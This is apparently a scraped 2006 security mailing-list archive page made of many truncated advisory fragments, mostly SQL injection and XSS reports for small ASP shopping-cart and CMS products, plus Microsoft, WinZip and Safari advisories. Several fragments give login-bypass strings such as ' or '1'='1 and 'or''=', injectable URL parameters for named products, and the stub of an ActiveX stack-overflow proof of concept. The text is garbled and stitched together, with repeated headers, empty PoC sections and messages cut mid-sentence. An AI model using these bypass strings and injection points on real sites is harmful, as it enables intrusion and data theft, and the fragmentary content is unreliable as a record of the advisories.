#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/Real Estate Listing
System.txt
#---
#Software: Real Estate Listing System
#Method :
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1210-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 14th, 2006
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/ASPintranet.txt
#---
#Software: ASPintranet
#Method : Sql Injection
#
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/SiteXpress.txt
#---
#Software: SiteXpress E-Commerce System
#Method : SQL Injection
#
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/WWWeb Cocepts.txt
#---
#Software: WWWeb Cocepts
#Method : Sql Injection
#
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/UStore.txt
#---
#Software: UStore | E-Commerce in 15-Minutes
#Method : Sql Injection
#
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/ecommercestore.txt
#---
#Software: E Commerce Store Shop Builder
#Method : SQL
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/eShopping.txt
#---
#Software: eShopping Cart
#Method : SQL Injection
#
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/Engine Manager.txt
#---
#Software: Engine Manager
#Method: SQL Injection
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/bpg.txt
#---
#Software: BPG Content Management System
#Method: SQL Injection
#PoC:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: Dotdeb PHP Email Header Injection Vulnerability
Release Date: 2006/11/14
Last Modified:
The following bug was tested on the latest version of Safari on a fully-patched
Mac OS X 10.4.
A remote attacker may exploit this issue to crash the application, effectively
denying service to legitimate users. Successful exploitation could lead to
remote code execution.
script
var reg =
Raphael Marichez to Nick Boyce (??):
um ... doesn't that make it a *remote* privilege escalation ?
in a certain way... you're right... although that requires the user
complicity, strictly speaking, you're right.
Makes it no less remote.
Not _automatic_ remote, but still very, very much
Nick Boyce wrote:
On 11/7/06, Raphael Marichez [EMAIL PROTECTED] wrote:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
vendor site:http://www.websitedesignsforless.com/
product:Inventory Manager
bug:injection sql xss (get)
risk:medium
injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=[sql]
vendor site:http://www.lynxinternet.com/
product:Evolve Merchant
bug:injection sql
risk:medium
injection sql (get) :
http://site.com/viewcart.asp?zoneid='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Car Site Manager [injection sql xss (get)]
vendor site:http://www.mginternet.com/
product:Car Site Manager
bug:injection sql
risk:medium
injection sql :
http://site.com/csm/asp/detail.asp?l=p='[sql]
http://site.com/csm/asp/listings.asp?l='[sql]
This is bogus, about 5-10 lines above it includes a file which declares
$pathToFiles.
include ('./setup_options.php');
if(!isset($startIndex)) $startIndex=$indexphp;
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
$langOrig=$lang;
vendor site:http://www.funkyasp.co.uk/
product:FunkyASP Glossary v1.0
bug:injection sql
risk:medium
injection sql :
http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site:http://www.drumster.net/
product:Blogme v3
bug:login bypass xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié benjamin mossé
http://s-a-p.ca/
vendor site:http://www.mginternet.com/
product:Property Site Manager
bug:injection sql ,login bypass , xss
risk:medium
login bypass :
just login with :
user: 'or''='
passwd: 'or''='
injection sql :
http://site.com/asp/detail.asp?l=p='[sql]
http://site.com/asp/listings.asp?l='[sql]
I think the list spam trap ate this message a few weeks ago.
---BeginMessage---
This was supposed to go out on Halloween but it didn't... but either way
all you Mac users can get scared or something. OOGA BOOGA!
pwntego.tar.gz
Description: GNU Zip compressed data
DMA[2006-1031a] - 'Intego
7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
below;
HTML
HEAD
TITLE/TITLE
/HEAD
BODY
SCRIPT LANGUAGE=VBScript
!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = SMASHTHESTACKHERE
end sub
--
/SCRIPT
OBJECT
I think the list spam trap ate this message a few weeks ago.
---BeginMessage---
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# = ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# This is some fairly blatant and retarded
eEye Research - http://research.eeye.com
Workstation Service NetpManageIPCConnect Buffer Overflow
Release Date:
November 14, 2006
Date Reported:
July 25, 2006
Severity:
High (Remote Code Execution)
Vendor:
Microsoft
Systems Affected:
Windows 2000 (Remote Code Execution)
Windows XP SP1 (Local
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
November 14, 2006
-- CVE ID:
CVE-2006-5198
-- Affected Vendor:
WinZip
-- Affected Products:
WinZip 10.0 (pre build 7245)
-- TippingPoint(TM)
ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-041.html
November 14, 2006
-- CVE ID:
CVE-2006-4687
-- Affected Vendor:
Microsoft
-- Affected Products:
Internet Explorer 6
--
vendor site:http://www.webinhabit.com/
product:A+ Store E-Commerce
bug:injection sql xss post
risk:medium
injection sql (get) :
http://site.com/browse.asp?ParentID='[sql]
xss post :
in /account_login.asp:
username =
vendor site:http://www.alanward.net/
product:A-Cart pro
bug:injection sql
risk:medium
injection sql (get) :
/category.asp?catcode='[sql]
/product.asp?productid='[sql]
injection sql (post) :
http://site.com/search.asp
Variables:
/search.asp?search='[sql]
( or just post your query in the
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroupsearchstring='[sql]
( or just post your query in the search
30 matches
Mail list logo